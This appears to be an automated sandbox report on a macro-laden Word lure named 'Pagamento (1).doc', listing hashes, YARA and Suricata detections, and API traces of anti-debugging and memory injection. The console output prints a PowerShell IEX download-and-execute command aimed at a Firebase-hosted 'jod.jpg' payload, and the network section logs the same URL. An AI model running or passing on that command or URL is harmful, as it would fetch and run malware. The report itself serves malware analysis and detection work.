Summary | ZeroBOX

Pagamento (1).doc

VBA_macro Generic Malware Downloader task schedule Antivirus Code injection PWS ScreenShot KeyLogger DNS Sniff Audio MSOffice File AntiDebug AntiVM PowerShell
Category Machine Started Completed
FILE s1_win7_x6402 June 18, 2023, 12:13 p.m. June 18, 2023, 12:15 p.m.
Size 132.0KB
Type Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Author: Tiago Oliveira, Template: Normal, Last Saved By: SISTEMA -PC, Revision Number: 7, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Feb 28 04:44:00 2023, Last Saved Time/Date: Fri Jun 16 16:31:00 2023, Number of Pages: 1, Number of Words: 0, Number of Characters: 1, Security: 0
MD5 8c390292fb5916ec70e5c64016675687
SHA256 5de1a4ad452af2f5bff7b232c22e2f397d1af97a95ee427d85ea927986d8b31f
CRC32 05139461
ssdeep 3072:ik07xEjkTkwRlrF+ix0p7dhlV/cDK6IN7EXDwXLCCJ:iDEjkomQgshoXDOLC
Yara
  • Microsoft_Office_File_Zero - Microsoft Office File
  • Contains_VBA_macro_code - Detect a MS Office document with embedded VBA macro code [binaries]
  • Generic_Malware_Zero - Generic Malware

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.102:49165 -> 172.217.31.10:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined

Suricata TLS

Flow Issuer Subject Fingerprint
TLSv1
192.168.56.102:49165
172.217.31.10:443
C=US, O=Google Trust Services LLC, CN=GTS CA 1C3 CN=upload.video.google.com a4:d0:2e:0c:fb:98:7c:38:24:ed:cc:2b:fe:74:aa:48:c4:9a:27:90

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: The term 'xWYojxpMG' is not recognized as the name of a cmdlet, function, scrip
console_handle: 0x00000023
1 1 0

WriteConsoleW

buffer: t file, or operable program. Check the spelling of the name, or if a path was i
console_handle: 0x0000002f
1 1 0

WriteConsoleW

buffer: ncluded, verify that the path is correct and try again.
console_handle: 0x0000003b
1 1 0

WriteConsoleW

buffer: At line:10 char:18
console_handle: 0x00000047
1 1 0

WriteConsoleW

buffer: + if (xWYojxpMG <<<< == 2.843074E+29)
console_handle: 0x00000053
1 1 0

WriteConsoleW

buffer: + CategoryInfo : ObjectNotFound: (xWYojxpMG:String) [], CommandNo
console_handle: 0x0000005f
1 1 0

WriteConsoleW

buffer: tFoundException
console_handle: 0x0000006b
1 1 0

WriteConsoleW

buffer: + FullyQualifiedErrorId : CommandNotFoundException
console_handle: 0x00000077
1 1 0

WriteConsoleW

buffer: True
console_handle: 0x00000013
1 1 0

WriteConsoleW

buffer: The term 'oawnduawdnnhn9283h1921nawodanfiawbdniufbnaidwuaifuabiufbaiudbhjawdbaf
console_handle: 0x00000027
1 1 0

WriteConsoleW

buffer: hj' is not recognized as the name of a cmdlet, function, script file, or operab
console_handle: 0x00000033
1 1 0

WriteConsoleW

buffer: le program. Check the spelling of the name, or if a path was included, verify t
console_handle: 0x0000003f
1 1 0

WriteConsoleW

buffer: hat the path is correct and try again.
console_handle: 0x0000004b
1 1 0

WriteConsoleW

buffer: At line:1 char:250
console_handle: 0x00000057
1 1 0

WriteConsoleW

buffer: + IEX (New-Object Net.WebClient).DownloadString('https://firebasestorage.google
console_handle: 0x00000063
1 1 0

WriteConsoleW

buffer: apis.com/v0/b/fir-8c14f.appspot.com/o/jod.jpg?alt=media&token=3735f1cc-35d0-4ce
console_handle: 0x0000006f
1 1 0

WriteConsoleW

buffer: a-8a29-811cec71fe1b');oawnduawdnnhn9283h1921nawodanfiawbdniufbnaidwuaifuabiufba
console_handle: 0x0000007b
1 1 0

WriteConsoleW

buffer: iudbhjawdbafhj <<<<
console_handle: 0x00000087
1 1 0

WriteConsoleW

buffer: + CategoryInfo : ObjectNotFound: (oawnduawdnnhn92...aiudbhjawdbaf
console_handle: 0x00000093
1 1 0

WriteConsoleW

buffer: hj:String) [], CommandNotFoundException
console_handle: 0x0000009f
1 1 0

WriteConsoleW

buffer: + FullyQualifiedErrorId : CommandNotFoundException
console_handle: 0x000000ab
1 1 0

WriteConsoleW

buffer: DONT CLOSE THIS WINDOW!
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: The batch file cannot be found.
console_handle: 0x0000000b
1 1 0

WriteConsoleW

buffer: Active code page: 65001
console_handle: 0x00000013
1 1 0

WriteConsoleA

buffer: Microsoft (R) .NET Framework Services Installation Utility Version 4.0.30319.17929 Copyright (C) Microsoft Corporation. All rights reserved.
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: USAGE: regsvcs.exe [options] AssemblyName Options: /? or /help Display this usage message. /fc Find or create target application (default). /c Create target application, error if it already exists. /exapp
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: Expect an existing application. /tlb:<tlbfile> Filename for the exported type library. /appname:<name> Use the specified name for the target application. /parname:<name> Use the specified name or id for the target partition. /e
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: xtlb Use an existing type library. /reconfig Reconfigure existing target application (default). /noreconfig Don't reconfigure existing target application. /u Uninstall target application. /nologo
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: Suppress logo output. /quiet Suppress logo output and success output. /componly Configure components only, no methods or interfaces. /appdir:<path> Set application root directory to specified path.
console_handle: 0x00000007
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00385248
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00384f88
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00384f88
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00384f88
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00384b88
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00384b88
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00384b88
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00384b88
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00384b88
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00384b88
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00384688
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00384688
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00384688
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00385188
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00385188
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00385188
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00384d48
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00385188
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00385188
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00385188
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00385188
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00385188
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00385188
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00385188
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00385048
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00385048
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00385048
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00385048
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00385048
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00385048
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00385048
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00385048
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00385048
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00385048
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00385048
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00385048
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00385048
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00385048
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003847c8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003847c8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x050e34b8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x050e34b8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x050e34b8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x050e34b8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x050e34b8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x050e34b8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x050e36b8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x050e36b8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
Time & API Arguments Status Return Repeated

__exception__

stacktrace:
RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x750b374b
NdrAllocate+0x5c8 RpcBindingFromStringBindingA-0xca4 rpcrt4+0x42b08 @ 0x750d2b08
NdrGetBuffer+0xf4 NdrSendReceive-0x6 rpcrt4+0x1801a @ 0x750a801a
SLClose-0x28e osppc+0x33cf @ 0x737c33cf
SLLoadApplicationPolicies+0xa99 SLCallServer-0x330 osppc+0x15dba @ 0x737d5dba
SLClose+0x4c4 SLpBeginGenuineTicketTransaction-0x4f79 osppc+0x3b21 @ 0x737c3b21
SLpVLActivateProduct+0xcb SLpGetMSPidInformation-0x111 osppc+0x12074 @ 0x737d2074
SLActivateProduct+0x48e SLInitialize-0x110a osppcext+0x385c7 @ 0x667985c7
??0OdfStgParams@@QAE@XZ+0xbae22 mso+0xfbdd28 @ 0x7098dd28
DllGetLCID+0x5c042 _MsoWebServerSupportEx@12-0x1c8a2b mso+0x6bc415 @ 0x7008c415
_MsoFGetTooltips@0+0x8918 _MsoHrSimpleQueryInterface@16-0x1221a mso+0xc90c4 @ 0x6fa990c4
_MsoFGetTooltips@0+0x88ca _MsoHrSimpleQueryInterface@16-0x12268 mso+0xc9076 @ 0x6fa99076
_MsoPeekMessage@8+0x49a0 _MsoGetStringTypeExW@20-0x1697 mso+0xb724d @ 0x6fa8724d
_MsoCpgFromChs@4+0x14e3 _MsoCrCbvGet@4-0xa6c mso+0x30f14 @ 0x6fa00f14
_MsoGetHmodPTLServices@0+0x4883 _MsoCpgFromChs@4-0x1e10 mso+0x2dc21 @ 0x6f9fdc21
_MsoGetHmodPTLServices@0+0x45f3 _MsoCpgFromChs@4-0x20a0 mso+0x2d991 @ 0x6f9fd991
_MsoGetHmodPTLServices@0+0x326f _MsoCpgFromChs@4-0x3424 mso+0x2c60d @ 0x6f9fc60d
_MsoFCreateIPref@28+0x143f _MsoFUseIEFeature@8-0xee0 mso+0x22ce6 @ 0x6f9f2ce6
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x74e833ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x774a9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x774a9ea5

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0x8007007b
exception.offset: 46887
exception.address: 0x7588b727
registers.esp: 108852260
registers.edi: 108852424
registers.eax: 108852260
registers.ebp: 108852340
registers.edx: 0
registers.ebx: 108853476
registers.esi: 2147942523
registers.ecx: 2147483648
1 0 0

__exception__

stacktrace:
RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x750b374b
NdrAllocate+0x5c8 RpcBindingFromStringBindingA-0xca4 rpcrt4+0x42b08 @ 0x750d2b08
NdrGetBuffer+0xf4 NdrSendReceive-0x6 rpcrt4+0x1801a @ 0x750a801a
SLClose-0x28e osppc+0x33cf @ 0x737c33cf
SLLoadApplicationPolicies+0xa99 SLCallServer-0x330 osppc+0x15dba @ 0x737d5dba
SLClose+0x4c4 SLpBeginGenuineTicketTransaction-0x4f79 osppc+0x3b21 @ 0x737c3b21
SLpGetTokenActivationGrantInfo+0x13c SLpGenerateTokenActivationChallenge-0x11c osppc+0x13102 @ 0x737d3102
SLGetTokenActivationGrants+0x710 SLGetTokenActivationCertificates-0x7a8 osppcext+0x5f7d0 @ 0x667bf7d0
??0OdfStgParams@@QAE@XZ+0xbb1e7 mso+0xfbe0ed @ 0x7098e0ed
??0OdfStgParams@@QAE@XZ+0xbb3c9 mso+0xfbe2cf @ 0x7098e2cf
DllGetClassObject+0x3c2bb _MsoFActivateControl@4-0x25231 mso+0xa84871 @ 0x70454871
DllGetClassObject+0x3c339 _MsoFActivateControl@4-0x251b3 mso+0xa848ef @ 0x704548ef
_MsoFHideTaiwan@0+0x4ccf _MsoSetLVProperty@8-0x7e2a9 mso+0x274ea0 @ 0x6fc44ea0
_MsoFDoSmartTagSecurityCheck@8+0xb6367 _MsoCompareStringA@24-0x391 mso+0x61d7ab @ 0x6ffed7ab
??0OdfStgParams@@QAE@XZ+0xec034 mso+0xfeef3a @ 0x709bef3a
DllGetLCID+0x5c144 _MsoWebServerSupportEx@12-0x1c8929 mso+0x6bc517 @ 0x7008c517
_MsoFGetTooltips@0+0x8918 _MsoHrSimpleQueryInterface@16-0x1221a mso+0xc90c4 @ 0x6fa990c4
_MsoFGetTooltips@0+0x8844 _MsoHrSimpleQueryInterface@16-0x122ee mso+0xc8ff0 @ 0x6fa98ff0
_MsoPeekMessage@8+0x49e5 _MsoGetStringTypeExW@20-0x1652 mso+0xb7292 @ 0x6fa87292
_MsoPeekMessage@8+0x49a0 _MsoGetStringTypeExW@20-0x1697 mso+0xb724d @ 0x6fa8724d
_MsoCpgFromChs@4+0x14e3 _MsoCrCbvGet@4-0xa6c mso+0x30f14 @ 0x6fa00f14
_MsoGetHmodPTLServices@0+0x4883 _MsoCpgFromChs@4-0x1e10 mso+0x2dc21 @ 0x6f9fdc21
_MsoGetHmodPTLServices@0+0x45f3 _MsoCpgFromChs@4-0x20a0 mso+0x2d991 @ 0x6f9fd991
_MsoPeekMessage@8+0x4537 _MsoGetStringTypeExW@20-0x1b00 mso+0xb6de4 @ 0x6fa86de4
_MsoPeekMessage@8+0x446e _MsoGetStringTypeExW@20-0x1bc9 mso+0xb6d1b @ 0x6fa86d1b
_MsoPeekMessage@8+0x16ad _MsoGetStringTypeExW@20-0x498a mso+0xb3f5a @ 0x6fa83f5a
_MsoPeekMessage@8+0x2294 _MsoGetStringTypeExW@20-0x3da3 mso+0xb4b41 @ 0x6fa84b41
_MsoPeekMessage@8+0x1196 _MsoGetStringTypeExW@20-0x4ea1 mso+0xb3a43 @ 0x6fa83a43
_GetAllocCounters@0+0x5006f DllGetLCID-0x1a6bbf wwlib+0x66e37 @ 0x71fb6e37
_GetAllocCounters@0+0x50f95 DllGetLCID-0x1a5c99 wwlib+0x67d5d @ 0x71fb7d5d
_GetAllocCounters@0+0x4d89f DllGetLCID-0x1a938f wwlib+0x64667 @ 0x71fb4667
_GetAllocCounters@0+0x4c3a1 DllGetLCID-0x1aa88d wwlib+0x63169 @ 0x71fb3169
_GetAllocCounters@0+0x4a61e DllGetLCID-0x1ac610 wwlib+0x613e6 @ 0x71fb13e6
wdCommandDispatch-0x964 winword+0x1602 @ 0x2f881602
wdCommandDispatch-0x9cc winword+0x159a @ 0x2f88159a
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x74e833ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x774a9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x774a9ea5

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0xc004f011
exception.offset: 46887
exception.address: 0x7588b727
registers.esp: 2081740
registers.edi: 2081904
registers.eax: 2081740
registers.ebp: 2081820
registers.edx: 0
registers.ebx: 2082956
registers.esi: 3221549073
registers.ecx: 2147483648
1 0 0
suspicious_features GET method with no useragent header suspicious_request GET https://firebasestorage.googleapis.com/v0/b/fir-8c14f.appspot.com/o/jod.jpg?alt=media&token=3735f1cc-35d0-4cea-8a29-811cec71fe1b
request GET https://firebasestorage.googleapis.com/v0/b/fir-8c14f.appspot.com/o/jod.jpg?alt=media&token=3735f1cc-35d0-4cea-8a29-811cec71fe1b
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 3036
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6a351000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 3036
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00643000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 3036
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00643000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 3036
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00644000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 3036
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00644000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 3036
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x66b24000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2184
region_size: 720896
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02950000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2184
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x029c0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2184
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x68e61000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2184
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0263a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2184
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x68e62000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2184
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02632000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2184
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02642000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2184
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x029c1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2184
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x029c2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2184
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0266a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2184
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02643000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2184
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02644000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2184
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026bb000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2184
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026b7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2184
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0263b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2184
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02662000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2184
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026b5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2184
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02645000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2184
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0266c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2184
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b60000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2184
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02646000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2184
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026bc000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2184
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02663000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2184
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02664000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2184
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02665000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2184
